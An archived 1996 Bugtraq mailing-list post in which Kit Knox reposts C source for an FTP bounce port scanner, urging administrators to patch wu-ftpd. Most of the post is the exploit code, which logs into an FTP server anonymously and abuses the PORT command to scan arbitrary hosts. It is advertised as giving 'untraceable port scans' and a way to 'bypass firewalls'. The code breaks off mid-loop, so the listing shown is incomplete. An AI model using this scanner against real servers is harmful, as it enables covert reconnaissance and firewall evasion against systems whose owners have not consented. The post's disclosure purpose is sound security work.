From: SMTP%"BUGTRAQ@NETSPACE.ORG" 5-AUG-1996 19:28:29.50 To: EVERHART CC: Subj: BoS: ftp port scanner Resent-Date: Sun, 4 Aug 1996 19:16:35 +1000 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: Aleph One Message-ID: Date: Sun, 4 Aug 1996 00:30:14 -0700 Reply-To: Bugtraq List Sender: proff@suburbia.net From: Aleph One To: Multiple recipients of list BUGTRAQ Resent-Message-ID: <"i1sbY1.0.bE1.of61o"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/187 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: ftp port scanner From: Kit Knox Here is some code I posted to bugtraq a few months ago that Scott chose to either censor for some reason or was lost. I'm reposting it again so everyone will be inspired to patch their ftpd's. I reccomend the following -> ftp://ftp.academ.com/pub/wu-ftpd/private/wu-ftpd-2.4.2-beta-11.tar.Z NOTE: This is just a demo. Email among other things may be sent via this same "bug". Code compiled under linux/solaris. Mileage may vary. /* * FTP Scan (C) 1996 Kit Knox * * Exploits bug in FTP protocol that allows user to connect to arbritary * IP address and port. * * Features: Untraceable port scans. Bypass firewalls! * * Example usage: * * ftp-scan ftp.cdrom.com 127.0.0.1 0 1024 * * This will scan IP 127.0.0.1 from ftp.cdrom.com from port 0 to 1024 * */ #include #include #include #include #include #include #include int sock; char line[1024]; void rconnect(char *server) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(server); if (hp==NULL) { printf("Unknown host: %s\n",server); exit(0); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(21); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); } void login(void) { char buf[1024]; sprintf(buf,"USER ftp\n"); send(sock, buf, strlen(buf),0); sleep(1); sprintf(buf,"PASS user@\n"); send(sock, buf, strlen(buf),0); } void readln(void) { int i,done=0,w; char tmp[1]; sprintf(line,""); i = 0; while (!done) { w=read(sock,tmp, 1, 0); if (tmp[0] != 0) { line[i] = tmp[0]; } if (line[i] == '\n') { done = 1; } i++; } line[i] = 0; } void sendln(char s[1024]) { send(sock, s, strlen(s),0); } #define UC(b) (((int)b)&0xff) void main(int argc, char **argv) { char buf[1024]; int i; u_short sport,eport; register char *p,*a; struct hostent *hp; struct sockaddr_in sin; char adr[1024]; if (argc != 5) { printf("usage: ftp-scan ftp_server scan_host loport hiport\n"); exit(-1); } hp = gethostbyname(argv[2]); if (hp==NULL) { printf("Unknown host: %s\n",argv[2]); exit(0); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); rconnect(argv[1]); /* Login anon to server */ login(); /* Make sure we are in */ for (i=0; i<200; i++) { readln(); if (strstr(line,"230 Guest")) { printf("%s",line); i = 200; } } a=(char *)&sin.sin_addr; sport = atoi(argv[3]); eport = atoi(argv[4]); sprintf(adr,"%i,%i,%i,%i",UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3])); for (i=sport; i